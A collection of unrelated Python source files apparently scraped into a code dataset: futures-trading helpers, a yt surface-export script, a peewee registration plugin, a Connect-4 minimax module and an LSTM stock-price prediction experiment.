'CZCE.OI', 'CZCE.MA',\n 'CZCE.FG', 'CZCE.RM', 'CZCE.ZC', 'CZCE.SF', 'CZCE.SM', 'CZCE.AP']\n instruments4DCE = [\n 'DCE.A', 'DCE.B', 'DCE.C', 'DCE.CS', 'DCE.I', 'DCE.J',\n 'DCE.JD', 'DCE.JM', 'DCE.L', 'DCE.M', 'DCE.P',\n 'DCE.PP', 'DCE.V', 'DCE.Y']\n instruments4SHFE = [\n 'SHFE.AL', 'SHFE.BU', 'SHFE.CU', 'SHFE.SN', 'SHFE.ZN',\n 'SHFE.HC', 'SHFE.NI', 'SHFE.PB', 'SHFE.RB', 'SHFE.RU', 'SHFE.AG', 'SHFE.AU']\n instruments4INE = [\n 'INE.SC']\n instruments4CFFEX = [\n 'CFFEX.IC', 'CFFEX.IH', 'CFFEX.IF', 'CFFEX.T', 'CFFEX.TF']\n return instruments4CZCE + instruments4DCE + instruments4SHFE + instruments4INE + instruments4CFFEX\n\n\ndef getFullSymbolName(astrList):\n resuList = []\n cList = contracts4wangzong()\n for acStr in astrList:\n for aSy in cList:\n if acStr in aSy:\n resuList.append(aSy)\n break\n\n return resuList\n\n\ndef getMainContinContract(aSymbol):\n if aSymbol == np.nan:\n return np.nan\n else:\n noDigit = re.sub('\\\\d+', '', aSymbol)\n return noDigit.upper()\n\n\ndef runAQQ(who, msg):\n import win32gui, win32con, win32clipboard as w\n\n def getText():\n w.OpenClipboard()\n d = 
w.GetClipboardData(win32con.CF_UNICODETEXT)\n w.CloseClipboard()\n return d\n\n def setText(aString):\n w.OpenClipboard()\n w.EmptyClipboard()\n w.SetClipboardData(win32con.CF_UNICODETEXT, aString)\n w.CloseClipboard()\n\n to_who1 = who\n content = '机器人信息:' + msg\n setText(content)\n qqhd = win32gui.FindWindow(None, to_who1)\n print(qqhd)\n win32gui.SendMessage(qqhd, 258, 22, 2080193)\n win32gui.SendMessage(qqhd, 770, 0, 0)\n win32gui.SendMessage(qqhd, win32con.WM_KEYDOWN, win32con.VK_RETURN, 0)\n win32gui.SendMessage(qqhd, win32con.WM_KEYUP, win32con.VK_RETURN, 0)\n\n\ndef btStartEndDates():\n import time, datetime\n currDateTime = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))\n currDate = currDateTime[0:10]\n aSTimeStr = '08:00:00'\n aeTimeStr = '16:00:00'\n m1dt = datetime.datetime.strptime(currDate, '%Y-%m-%d') + DateOffset(years=(-1), months=(-3))\n m1dtStr = m1dt.strftime('%Y-%m-%d')\n m2dt = datetime.datetime.strptime(currDate, '%Y-%m-%d') + DateOffset(days=(-2))\n m2dtStr = m2dt.strftime('%Y-%m-%d')\n nextYearofToday = datetime.datetime.strptime(currDate, '%Y-%m-%d') + DateOffset(years=1)\n nextYearofTodayStr = nextYearofToday.strftime('%Y-%m-%d')\n aTradingDays = get_trading_dates(exchange='SHSE', start_date='2000-01-01', end_date=nextYearofTodayStr)\n aNewTradeCalendar = calendayBylw.customTradeCalendar(aTradingDays)\n backTestsDateT = aNewTradeCalendar.mDatesOffset(m1dtStr, yoffset=0) + ' ' + aSTimeStr\n backTesteDateT = aNewTradeCalendar.mDatesOffset(m2dtStr, yoffset=0) + ' ' + aeTimeStr\n maxLen = 60\n barsNum = 3\n\n\ndef updateMFE(aOrderMFEdict, basicBar_):\n if not aOrderMFEdict is not None:\n raise AssertionError\n else:\n assert basicBar_ is not None\n posi = aOrderMFEdict['orderPosition']\n if posi.barsSinceEntry > 0:\n if posi.barsSinceEntry == 1:\n aOrderMFEdict['HH'] = basicBar_.getHigh()\n aOrderMFEdict['LL'] = basicBar_.getLow()\n else:\n aOrderMFEdict['HH'] = max(aOrderMFEdict['HH'], basicBar_.getHigh())\n aOrderMFEdict['LL'] = min(aOrderMFEdict['LL'], basicBar_.getLow())\n if posi.positionSide == 'long':\n aOrderMFEdict['MFE'] = aOrderMFEdict['HH'] - posi.cost\n if posi.positionSide == 'short':\n aOrderMFEdict['MFE'] = posi.cost - aOrderMFEdict['LL']\n\n\ndef copyFiles2(sourceDir, targetDir, filename=None):\n import os, shutil\n if sourceDir.find('exceptionfolder') > 0:\n return\n else:\n if filename:\n sourceFile = os.path.join(sourceDir, filename)\n targetFile = os.path.join(targetDir, filename)\n if os.path.isfile(sourceFile):\n if not os.path.exists(targetDir):\n os.makedirs(targetDir)\n if not os.path.exists(targetFile) or os.path.exists(targetFile) and os.path.getsize(targetFile) != os.path.getsize(sourceFile):\n open(targetFile, 'wb').write(open(sourceFile, 'rb').read())\n print(targetFile + ' copy succeeded')\n if os.path.isdir(sourceFile):\n copyFiles(sourceFile, targetFile)\n else:\n for file in os.listdir(sourceDir):\n sourceFile = os.path.join(sourceDir, file)\n targetFile = os.path.join(targetDir, file)\n if os.path.isfile(sourceFile):\n if not os.path.exists(targetDir):\n os.makedirs(targetDir)\n if not os.path.exists(targetFile) or os.path.exists(targetFile) and os.path.getsize(targetFile) != os.path.getsize(sourceFile):\n open(targetFile, 'wb').write(open(sourceFile, 'rb').read())\n print(targetFile + ' copy succeeded')\n if os.path.isdir(sourceFile):\n copyFiles(sourceFile, targetFile)\n\n\ndef cusCopyFile(sourceDir, targetDir, filename=None):\n import os, shutil\n ss = os.path.dirname(sourceDir)\n abDir = 
os.path.abspath(sourceDir)\n if filename:\n sourceFile = os.path.join(abDir, filename)\n os.system('copy %s %s' % (sourceFile, targetDir))\n else:\n for file in os.listdir(sourceDir):\n abDirFile = os.path.join(abDir, file)\n if os.path.isfile(abDirFile):\n os.system('copy %s %s' % (abDirFile, targetDir))\n\n\ndef writeLog2console(logInstance='aLogger', msg=None):\n import logging\n loggerCons = logging.getLogger(logInstance)\n formatter = logging.Formatter('%(asctime)s %(levelname)-8s: %(message)s')\n console_handler = logging.StreamHandler(sys.stdout)\n console_handler.formatter = formatter\n loggerCons.addHandler(console_handler)\n loggerCons.setLevel(logging.INFO)\n loggerCons.info(msg)\n\n\ndef writeLog2File(logInstance='aLogger', logfile=None, msg=None):\n import logging\n logger = logging.getLogger(logInstance)\n formatter = logging.Formatter('%(asctime)s %(levelname)-8s: %(message)s')\n file_handler = logging.FileHandler(logfile, mode='w')\n file_handler.setFormatter(formatter)\n logger.addHandler(file_handler)\n logger.setLevel(logging.INFO)\n logger.info(msg)\n\n\ndef splitDates(sDateTime, eDateTime, step_=3000, moreDataFlag=False):\n from gm.api import get_trading_dates\n import time, datetime\n from pandas.tseries.offsets import DateOffset\n currDateTime = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))\n currDate = currDateTime[0:10]\n nextYearofToday = datetime.datetime.strptime(currDate, '%Y-%m-%d') + DateOffset(years=1)\n nextYearofTodayStr = nextYearofToday.strftime('%Y-%m-%d')\n aTradingDays = get_trading_dates(exchange='SHSE', start_date='2000-01-01', end_date=nextYearofTodayStr)\n aNewTradeCalendar = calendayBylw.customTradeCalendar(aTradingDays)\n sDate = sDateTime[0:10]\n eDate = eDateTime[0:10]\n if moreDataFlag:\n ssDate = aNewTradeCalendar.mDatesOffset(sDate, doffset=(-1), leftOrright=(-1))\n eeDate = aNewTradeCalendar.mDatesOffset(eDate, doffset=1, leftOrright=1)\n else:\n ssDate = aNewTradeCalendar.mDatesOffset(sDate, doffset=0, leftOrright=1)\n eeDate = aNewTradeCalendar.mDatesOffset(eDate, doffset=0, leftOrright=(-1))\n atradeDateSerial = aNewTradeCalendar.getADateTimeSeries(ssDate, eeDate)\n datesList = []\n sIndex = 0\n eIndex = sIndex + step_ - 1\n while 1:\n cSdate = atradeDateSerial.iloc[sIndex]\n if eIndex >= atradeDateSerial.shape[0]:\n cEdate = atradeDateSerial.iloc[(-1)]\n else:\n cEdate = atradeDateSerial.iloc[eIndex]\n datesList.append((cSdate, cEdate))\n if eIndex >= atradeDateSerial.shape[0]:\n break\n else:\n sIndex = sIndex + step_\n eIndex = eIndex + step_\n\n atuple = datesList[0]\n datesList[0] = (atuple[0] + sDateTime[10:], atuple[1])\n atuple = datesList[(-1)]\n datesList[-1] = (atuple[0], atuple[1] + eDateTime[10:])\n return datesList\n\n\ndef dtToUnixTimeStamp(adt):\n ats = int(adt.timestamp() * 1000)\n return ats\n\n\ndef round_up(value, y):\n import math\n ss = math.pow(10, y)\n vs = round(value * ss) / float(ss)\n return vs\n\n\ndef isCrossDay(symbol, lastDT, currDT):\n lastDate = lastDT[0:10]\n currDate = currDT[0:10]\n lastTime = lastDT[11:]\n nowTime = currDT[11:]\n if lastDate == currDate:\n if lastTime <= FUTURES_CN_Day_ENDTIME:\n if nowTime >= FUTURES_CN_Day_STARTTIME_N001:\n return True\n if lastDate < currDate:\n if lastTime <= FUTURES_CN_Day_ENDTIME:\n if nowTime >= FUTURES_CN_Day_STARTTIME_N002:\n return True\n return False\n\n\ndef readLastLine(filename, encoding='gbk'):\n with open(filename, 'rb') as (hisRecordFile):\n import os\n first = hisRecordFile.readline()\n nextbyte = hisRecordFile.read(1)\n if 
nextbyte == b'':\n last = first\n else:\n hisRecordFile.seek(-2, os.SEEK_END)\n while nextbyte != b'\\n':\n hisRecordFile.seek(-2, os.SEEK_CUR)\n nextbyte = hisRecordFile.read(1)\n\n last = hisRecordFile.readline()\n lastStr = last.decode(encoding)\n return lastStr.strip('\\r\\n')\n\n\ndef rangeLeftAndRight(avalue, step, stepCount):\n aList = []\n for i in range(1, stepCount + 1):\n aList.append(avalue - i * step)\n aList.append(avalue + i * step)\n\n aList.append(avalue)\n return sorted(aList)\n\n\nimport os\n\ndef mkdir(path):\n path = path.strip()\n path = path.rstrip('\\\\')\n isExists = os.path.exists(path)\n if not isExists:\n os.makedirs(path)","sub_path":"pycfiles/quantlwsdk-0.0.12-py3-none-any/commonHelpBylw.cpython-36.py","file_name":"commonHelpBylw.cpython-36.py","file_ext":"py","file_size_in_byte":18136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"386454586","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# displayNumberType.py - displayNumberType\n\n# Date : 2019/12/10\n\ndef displayNumberType(num):\n print(str(num) + ' is ', end='')\n if isinstance(num, (int, float, complex)):\n print('a number of type:', type(num).__name__)\n else:\n print('not a number at all!')\n\n\ndisplayNumberType(-69)\ndisplayNumberType(9999999999999999999)\ndisplayNumberType(98.6)\ndisplayNumberType(-5.2+1.9j)\ndisplayNumberType('xxx')\n","sub_path":"my/python-core/displayNumberType.py","file_name":"displayNumberType.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"280150369","text":"import yt\nimport numpy as np\nfrom yt import derived_field\n\n\n#@derived_field(name=\"emissivity\", units = \"g**2*K**0.5/cm**6\")\ndef run_stuff():\n # different data - FLASH\n filename = '~/data/GasSloshing/sloshing_nomag2_hdf5_plt_cnt_0100'\n sphere_rad = 15.0 # in kpc\n #Enzo\n filename = '~/data/IsolatedGalaxy/galaxy0030/galaxy0030'\n sphere_rad = 200.0 # in kpc\n outfile = 'galsurfaces'\n rho = 1e-27 # for each surface\n trans = 1.0 # for transparency of each surface\n color_field = 'temperature' # color your surface by this\n pf = yt.load(filename)\n # emissivity of the material\n # this needs to be a combination of the color_field and surface field\n #def _Emissivity(field, data):\n # return (eval(\"data['gas','density']*data['density']*np.sqrt(data['gas','temperature'])\"))\n def _Emissivity(field, data):\n return (data['gas','density']*data['density']*np.sqrt(data['gas','temperature']))\n #yt.add_field((\"gas\",\"emissivity\"), units=\"g**2*K**0.5/cm**6\", function=_Emissivity)\n yt.add_field(\"emissivity\", units=\"g**2*K**0.5/cm**6\", function=_Emissivity, force_override=True)\n # for testing\n #yt.SlicePlot(pf, 'z', \"emissivity\", width = (200.0, 'kpc')).save('~/Desktop/mytest.png')\n dd = pf.sphere(\"max\", (sphere_rad, \"kpc\"))\n surf = pf.surface(dd, 'density', rho)\n #surf.export_obj(outfile, transparency = trans, \n # color_field=color_field, emit_field = 'emissivity')\n emit_field_name = ('gas','emissivity')\n emit_field_max = None\n emit_field_min = None\n color_field_max = None\n color_field_min = None\n color_map = \"algae\"\n vertices, colors, alpha, emisses, colorindex = surf.export_blender(transparency = trans, \n color_field = color_field, emit_field = emit_field_name, color_map = color_map, \n plot_index = 0, \n color_field_max = color_field_max, color_field_min = color_field_min, \n emit_field_max = emit_field_max, 
emit_field_min = emit_field_min)\n return vertices\n\nv = run_stuff()\n","sub_path":"yt_files/createobj_emiss_clean.py","file_name":"createobj_emiss_clean.py","file_ext":"py","file_size_in_byte":2281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"522327656","text":"\"\"\"This module gives a service of registration to server\"\"\"\n\nfrom peewee import SqliteDatabase, Model, CharField\nfrom core.common.plugin import AbstractPlugin\n\n\nDB = SqliteDatabase(None, threadlocals=True)\n\n\nclass Collector(Model):\n \"\"\"This model represents an instance of information collector\"\"\"\n id_collector = CharField()\n\n class Meta:\n database = DB\n\n\nclass DataAccess(AbstractPlugin):\n \"\"\"This model gives a initial configuration for database\"\"\"\n\n def __init__(self, database_url):\n DB.init(database_url)\n Collector.create_table(fail_silently=True)\n\n\nclass Hook(DataAccess):\n \"\"\"This class sets some fields for send header request\"\"\"\n\n def __init__(self, container, database_url):\n super(Hook, self).__init__(\n database_url=database_url)\n self._container = container\n\n def process(self):\n try:\n id_collector = Collector.get().id_collector\n except Collector.DoesNotExist:\n id_collector = 0\n\n return {'Id-Collector': str(id_collector),\n 'MB': self._container.parameters['id']}\n\n\nclass Registration(DataAccess):\n \"\"\"This class manages the collector register\"\"\"\n\n def register(self, id_collector):\n \"\"\"This method regists a nev collector\"\"\"\n Collector.delete().execute()\n Collector.create(\n id_collector=str(id_collector)).save()\n","sub_path":"plugins/registration/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"509531581","text":"\"\"\"Generic utility functions\n\"\"\"\n# from __future__ import print_function\nfrom random import shuffle\nfrom threading import Thread\nfrom queue import Queue\nimport time\nimport copy\n\nfrom connect_4.consts import BOARD_ROWS, BOARD_COLS, OPPONENT_COLOR\n\nINFINITY_TIME = float(6000)\nINFINITY = float('inf')\n\n\nclass ExceededTimeError(RuntimeError):\n \"\"\"Thrown when the given function exceeded its runtime.\n \"\"\"\n pass\n\n\ndef function_wrapper(func, args, kwargs, result_queue):\n \"\"\"Runs the given function and measures its runtime.\n\n :param func: The function to run.\n :param args: The function arguments as tuple.\n :param kwargs: The function kwargs as dict.\n :param result_queue: The inter-process queue to communicate with the parent.\n :return: A tuple: The function return value, and its runtime.\n \"\"\"\n start = time.process_time()\n try:\n result = func(*args, **kwargs)\n except MemoryError as e:\n result_queue.put(e)\n return\n\n runtime = time.process_time() - start\n result_queue.put((result, runtime))\n\n\ndef run_with_limited_time(func, args, kwargs, time_limit):\n \"\"\"Runs a function with time limit\n\n :param func: The function to run.\n :param args: The functions args, given as tuple.\n :param kwargs: The functions keywords, given as dict.\n :param time_limit: The time limit in seconds (can be float).\n :return: A tuple: The function's return value unchanged, and the running time for the function.\n :raises PlayerExceededTimeError: If player exceeded its given time.\n \"\"\"\n q = Queue()\n t = Thread(target=function_wrapper, args=(func, args, kwargs, q))\n t.start()\n\n # This is just for limiting the 
runtime of the other thread, so we stop eventually.\n    # It doesn't really measure the runtime.\n    t.join(time_limit)\n\n    if t.is_alive():\n        raise ExceededTimeError\n\n    q_get = q.get()\n    if isinstance(q_get, MemoryError):\n        raise q_get\n    return q_get\n\n\ndef count_sequence(board, player, length):\n    \"\"\" Given the board state, the current player and the length of Sequence you want to count\n    Return the count of Sequences that have the given length\n    \"\"\"\n\n    def vertical_seq(row, col):\n        \"\"\"Return a weight (1-3) if it found a vertical sequence with the required length, else 0\n        \"\"\"\n        count = 0\n        for rowIndex in range(row, BOARD_ROWS):\n            if board[rowIndex][col] == board[row][col]:\n                count += 1\n            else:\n                break\n        if count >= length:\n            if row >= 1 and row+length < BOARD_ROWS:\n                if board[row-1][col] == 0 and board[row+length][col] == 0:\n                    return 3\n                elif board[row-1][col] == 0 or board[row+length][col] == 0:\n                    return 2\n                else:\n                    return 1\n            return 1\n        else:\n            return 0\n\n    def horizontalSeq(row, col):\n        \"\"\"Return a weight (1-3) if it found a horizontal sequence with the required length, else 0\n        \"\"\"\n        count = 0\n        for colIndex in range(col, BOARD_COLS):\n            if board[row][colIndex] == board[row][col]:\n                count += 1\n            else:\n                break\n        if count >= length:\n            if col >= 1 and col + length < BOARD_COLS:  # bounds check against columns, not rows\n                if board[row][col-1] == 0 and board[row][col+length] == 0:\n                    return 3\n                elif board[row][col-1] == 0 or board[row][col+length] == 0:\n                    return 2\n                else:\n                    return 1\n            return 1\n        else:\n            return 0\n\n    def negDiagonalSeq(row, col):\n        \"\"\"Return 1 if it found a negative diagonal sequence with the required length\n        \"\"\"\n        count = 0\n        col_index = col\n        for rowIndex in range(row, -1, -1):\n            if col_index >= BOARD_COLS:  # stay inside the board columns\n                break\n            elif board[rowIndex][col_index] == board[row][col]:\n                count += 1\n            else:\n                break\n            col_index += 1 # increment column when row is incremented\n        if count >= length:\n            return 1\n        else:\n            return 0\n\n    def posDiagonalSeq(row, col):\n        \"\"\"Return 1 if it found a positive diagonal sequence with the required length\n        \"\"\"\n        count = 0\n        colIndex = col\n        for rowIndex in range(row, BOARD_ROWS):\n            if colIndex >= BOARD_COLS:  # stay inside the board columns\n                break\n            elif board[rowIndex][colIndex] == board[row][col]:\n                count += 1\n            else:\n                break\n            colIndex += 1 # increment column when row incremented\n        if count >= length:\n            return 1\n        else:\n            return 0\n\n    totalCount = 0\n    # for each piece in the board...\n    for row in range(BOARD_ROWS):\n        for col in range(BOARD_COLS):\n            # ...that is of the player we're looking for...\n            if board[row][col] == player:\n                # check if a vertical streak starts at (row, col)\n                totalCount += vertical_seq(row, col)\n                # check if a horizontal four-in-a-row starts at (row, col)\n                totalCount += horizontalSeq(row, col)\n                # check if a diagonal (both +ve and -ve slopes) four-in-a-row starts at (row, col)\n                totalCount += (posDiagonalSeq(row, col) + negDiagonalSeq(row, col))\n    # return the sum of sequences of length 'length'\n    return totalCount\n
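\n# Usage sketch (hypothetical board: a BOARD_ROWS x BOARD_COLS grid of 0/1/2 cells):\n#   count_sequence(board, player=1, length=3)\n# counts player 1's runs of at least three in every direction; vertical and\n# horizontal runs that are open at one or both ends are weighted 2 or 3.\n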
\nclass MiniMaxWithAlphaBetaPruning:\n    def __init__(self, utility, my_color, no_more_time):\n        \"\"\"Initialize a MiniMax algorithm with alpha-beta pruning.\n\n        :param utility: The utility function. Should have state as parameter.\n        :param my_color: The color of the player who runs this MiniMax search.\n        :param no_more_time: A function that returns true if there is no more time to run this search, or false if\n                             there is still time left.\n        :param selective_deepening: A function that gets the current state, and\n                                    returns True when the algorithm should continue the search\n                                    for the minimax value recursively from this state.\n        \"\"\"\n        self.utility = utility\n        self.my_color = my_color\n        self.no_more_time = no_more_time\n\n    def search(self, game_state, depth, alpha, beta, maximizing_player):\n        \"\"\"Start the MiniMax algorithm.\n\n        :param game_state: The state to start from.\n        :param depth: The maximum allowed depth for the algorithm.\n        :param alpha: The alpha of the alpha-beta pruning.\n        :param beta: The beta of the alpha-beta pruning.\n        :param maximizing_player: Whether this is a max node (True) or a min node (False).\n        :return: A tuple: (The alpha-beta algorithm value, The move in case of max node or None in min mode)\n        \"\"\"\n        if self.no_more_time() or depth <= 0:\n            return self.utility(game_state), None\n\n        next_moves = game_state.get_possible_moves()\n        if not next_moves:\n            # This player has no moves. So the previous player is the winner.\n            return INFINITY if game_state.curr_player != self.my_color else -INFINITY, None\n\n        if maximizing_player:\n            selected_move = next_moves[0]\n            best_move_utility = -INFINITY\n            for move in next_moves:\n                new_state = game_state.cp()\n                new_state.perform_move((move, 0))\n                # print(new_state.board)\n\n                minimax_value, _ = self.search(new_state, depth - 1, alpha, beta, False)\n                alpha = max(alpha, minimax_value)\n                if minimax_value > best_move_utility:\n                    best_move_utility = minimax_value\n                    selected_move = move\n                if beta <= alpha or self.no_more_time():\n                    break\n            return alpha, selected_move\n\n        else:\n            for move in next_moves:\n                new_state = game_state.cp()\n                new_state.perform_move((move, 0))\n                beta = min(beta, self.search(new_state, depth - 1, alpha, beta, True)[0])\n                if beta <= alpha or self.no_more_time():\n                    break\n            return beta, None\n\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"374088540","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 17 02:28:05 2020\n\n@author: gbson\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom stockstats import StockDataFrame as Sdf\nimport pandas_datareader.data as web\nimport os\nimport time\n\nos.chdir('/home/gbson/Downloads/Recurrent_Neural_Networks/indicators_research')\n\nmsft = pd.read_pickle('MSFT.pkl')\n\nstock = Sdf.retype(msft)\n\n# volume delta against previous day\nstock['volume_delta']\n\n# open delta against next 2 day\nstock['open_2_d']\n\n# open price change (in percent) between today and the day before yesterday\n# 'r' stands for rate.\nstock['open_-2_r']\n\n# CR indicator, including 5, 10, 20 days moving average\nstock['cr']\nstock['cr-ma1']\nstock['cr-ma2']\nstock['cr-ma3']\n\n# volume max of three days ago, yesterday and two days later\nstock['volume_-3,2,-1_max']\n\n# volume min between 3 days ago and tomorrow\nstock['volume_-3~1_min']\n\n# KDJ, default to 9 days\nstock['kdjk']\nstock['kdjd']\nstock['kdjj']\n\n# three days KDJK cross up 3 days KDJD\n'''\nstock['kdj_3_xu_kdjd_3']\n'''\n\n# 2 days simple moving average on open price\nstock['open_2_sma']\n
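\n# Note: stockstats computes each column lazily on first access; the key string\n# encodes the window and operator (e.g. 'open_2_sma' is the 2-day simple moving\n# average of the open price).\n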
line\nstock['macds']\n# MACD histogram\nstock['macdh']\n\n# bolling, including upper band and lower band\nstock['boll']\nstock['boll_ub']\nstock['boll_lb']\n\n# close price less than 10.0 in 5 days count\nstock['close_10.0_le_5_c']\n\n# CR MA2 cross up CR MA1 in 20 days count\nstock['cr-ma2_xu_cr-ma1_20_c']\n\n# count forward(future) where close prise is larger than 10\nstock['close_10.0_ge_5_fc']\n\n# 6 days RSI\nstock['rsi_6']\n# 12 days RSI\nstock['rsi_12']\n\n# 10 days WR\nstock['wr_10']\n# 6 days WR\nstock['wr_6']\n\n# CCI, default to 14 days\nstock['cci']\n# 20 days CCI\nstock['cci_20']\n\n# TR (true range)\nstock['tr']\n# ATR (Average True Range)\nstock['atr']\n\n# DMA, difference of 10 and 50 moving average\nstock['dma']\n\n# DMI\n# +DI, default to 14 days\nstock['pdi']\n# -DI, default to 14 days\nstock['mdi']\n# DX, default to 14 days of +DI and -DI\nstock['dx']\n# ADX, 6 days SMA of DX, same as stock['dx_6_ema']\nstock['adx']\n# ADXR, 6 days SMA of ADX, same as stock['adx_6_ema']\nstock['adxr']\n\n# TRIX, default to 12 days\nstock['trix']\n# MATRIX is the simple moving average of TRIX\nstock['trix_9_sma']\n# TEMA, another implementation for triple ema\nstock['tema']\n\n# VR, default to 26 days\nstock['vr']\n# MAVR is the simple moving average of VR\nstock['vr_6_sma']\n\n\n\n# ticker name\nticker = 'MSFT'\n\n\n\n\n# manual tunning\n\ntimestep = 30\n\n\n\n\n\n\n\n\n\n# data preprocessing\n\n\n# filtrando na's\n\nstock.isnull().values.any()\nisnull = stock.isnull().any()\n\nstock_clean = stock.iloc[10:len(stock), :]\n\nstock_clean.isnull().values.any()\nisnull = stock_clean.isnull().any()\n\nstock_clean = stock_clean.iloc[:len(stock_clean) - 2, :]\n\nstock_clean.isnull().values.any()\nisnull = stock_clean.isnull().any()\n\n\n# removendo colunas indesejadas\nstock_clean.drop([ 'close_10.0_le', 'close_10.0_le_5_c', 'cr-ma1_20_c', 'cr-ma2_xu_cr-ma1_20_c', 'close_10.0_ge', 'close_10.0_ge_5_fc'],axis=1, inplace=True) # 1 = colunas | 0 = linhas\ndataset = stock_clean\ndataset = dataset.values\n\n# creating the benchmark dataset\ndataset_benchmarked = dataset[:100, :]\n\n# Feature Scaling\nfrom sklearn.preprocessing import MinMaxScaler\nsc = MinMaxScaler(feature_range = (0, 1))\n\ndataset_benchmarked_scaled = sc.fit_transform(dataset_benchmarked)\n\n\n# separando os datasets\ny = dataset_benchmarked_scaled[: ,3]\nX = dataset_benchmarked_scaled\n\nclose = dataset[: ,3]\nclose = close.reshape(-1,1)\nclose_scaled = sc.fit_transform(close)\n\n# Creating a data structure with 60 timesteps and 1 output\nX_train = [] # coleção de 60 dias antes do y\ny_train = [] # close\nfor i in range(timestep, len(X)):\n X_train.append(X[i-timestep:i, :])\n y_train.append(y[i])\nX_train, y_train = np.array(X_train), np.array(y_train)\n\n# Reshaping\nX_train = np.reshape(X_train, (X_train.shape[0], X_train.shape[1], 83)) # 83 = número de colunas\n\n\n\n# Part 2 - Building the RNN\n\n# Importing the Keras libraries and packages\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import LSTM\nfrom keras.layers import Dropout\n\n# Initialising the RNN\nregressor = Sequential()\n\n# Adding the first LSTM layer and some Dropout regularisation\nregressor.add(LSTM(units = 50, return_sequences = True, input_shape = (X_train.shape[1], 83))) # 83 inputs\nregressor.add(Dropout(0.2))\n\n# Adding a second LSTM layer and some Dropout regularisation\nregressor.add(LSTM(units = 50, return_sequences = True))\nregressor.add(Dropout(0.2))\n\n# Adding a third LSTM layer and some Dropout 
regularisation\nregressor.add(LSTM(units = 50, return_sequences = True))\nregressor.add(Dropout(0.2))\n\n# Adding a fourth LSTM layer and some Dropout regularisation\nregressor.add(LSTM(units = 50)) # não retorna nenhum valor para o início da NN\nregressor.add(Dropout(0.2))\n\n# Adding the output layer\nregressor.add(Dense(units = 1)) # units = 1 | pois só queremos 1 output\n\n# Compiling the RNN\nregressor.compile(optimizer = 'RMSprop', loss = 'mean_squared_error')\n# loss = 'mean_squared_error' | pois estamos fazendo uma regressão\n\n# Keras nos recomenda RMSprop como optimizer de RNNs, porém 'adam' tem melhor\n# performance neste modelo\n\n# Fitting the RNN to the Training set\nstart = time.time()\nregressor.fit(X_train, y_train, epochs = 100, batch_size = 32)\nend = time.time()\nend - start\n# batch_size = número de dados forward-propagated antes de ocorrer uma back-propagation\n\n\ninputs = dataset_benchmarked[len(dataset_benchmarked) - timestep - 30:]\n'''\ninputs.reshape(-1 ,1)\n'''\ninputs = sc.transform(inputs)\n\nX_test = []\nfor i in range(30, len(inputs)):\n X_test.append(inputs[i-30:i, :])\nX_test = np.array(X_test)\n\n'''\nX_test = np.reshape(X_test, (X_test.shape[0], X_test.shape[1], 83))\n'''\n# o código acima é desnecessário parece\n\npredicted_stock_price = regressor.predict(X_test)\npredicted_stock_price = sc.inverse_transform(predicted_stock_price) # este\n# comando desescalona os dados escalonados.\n\ny_test = dataset_benchmarked[len(dataset_benchmarked) - timestep:, 3]\n\n\n\n# visualizando os resultados\nplt.plot(y_test, color = 'red', label = 'Preço real')\nplt.plot(predicted_stock_price, color = 'blue', label = 'Preço predito')\nplt.title('{} Stock Price Prediction'.format(ticker))\nplt.xlabel('Time')\nplt.ylabel('{} Stock Price'.format(ticker))\nplt.legend()\nplt.show\n\nreal_stock_price = y_test\n\n# calculating the accuracy of the model\npredicted_dia_anterior = []\nfor i in range(0, len(predicted_stock_price) - 1):\n predicted_dia_anterior.append(predicted_stock_price[i])\npredicted_dia_anterior = np.array(predicted_dia_anterior)\n\npredicted_dia_posterior = []\nfor i in range(1, len(predicted_stock_price)):\n predicted_dia_posterior.append(predicted_stock_price[i])\npredicted_dia_posterior = np.array(predicted_dia_posterior)\n\nvar_sd = predicted_dia_posterior - predicted_dia_anterior\n\nsubiu_desceu_predicted = []\nfor i in range(0, len(var_sd)):\n if (var_sd[i] > 0):\n subiu_desceu_predicted.append(1)\n elif (var_sd[i] < 0):\n subiu_desceu_predicted.append(0)\n elif (var_sd[i] == 0):\n subiu_desceu_predicted.append('no variance')\n\n\n\npredicted_dia_anterior_real = []\nfor i in range(0, len(real_stock_price) - 1):\n predicted_dia_anterior_real.append(real_stock_price[i])\npredicted_dia_anterior_real = np.array(predicted_dia_anterior_real)\n\npredicted_dia_posterior_real = []\nfor i in range(1, len(real_stock_price)):\n predicted_dia_posterior_real.append(real_stock_price[i])\npredicted_dia_posterior_real = np.array(predicted_dia_posterior_real)\n\nvar_sd_real = predicted_dia_posterior_real - predicted_dia_anterior_real\n\nsubiu_desceu_real = []\nfor i in range(0, len(var_sd_real)):\n if (var_sd_real[i] > 0):\n subiu_desceu_real.append(1)\n elif (var_sd_real[i] < 0):\n subiu_desceu_real.append(0)\n elif (var_sd_real[i] == 0):\n subiu_desceu_real.append('no variance')\n \nacc = []\nfor i in range(0, len(subiu_desceu_real)):\n if (subiu_desceu_real[i] == subiu_desceu_predicted[i]):\n acc.append(1)\n else:\n acc.append(0)\n\ntotal_acc = (sum(acc) / len(acc)) * 
